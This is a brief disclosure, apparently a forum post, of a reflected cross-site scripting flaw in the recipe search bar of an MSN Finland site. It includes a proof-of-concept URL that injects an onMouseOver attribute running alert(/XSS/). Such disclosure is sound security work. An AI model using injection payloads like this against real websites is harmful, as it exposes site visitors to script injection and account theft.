The search bar on this page fails to encode the quotes (“) and as a result a onMouseOver event tag can be attached to the search bar which allows an XSS attack to occur.
Code:
1 2 3 4 5 |
http://ideakeittio.fi.msn.com/ruokaohjehaku/ ?q=" onMouseOver=alert(/XSS/) " &mealtypes=suolaiset &mealtypes=leivonta-2 &main_ingredient=1 |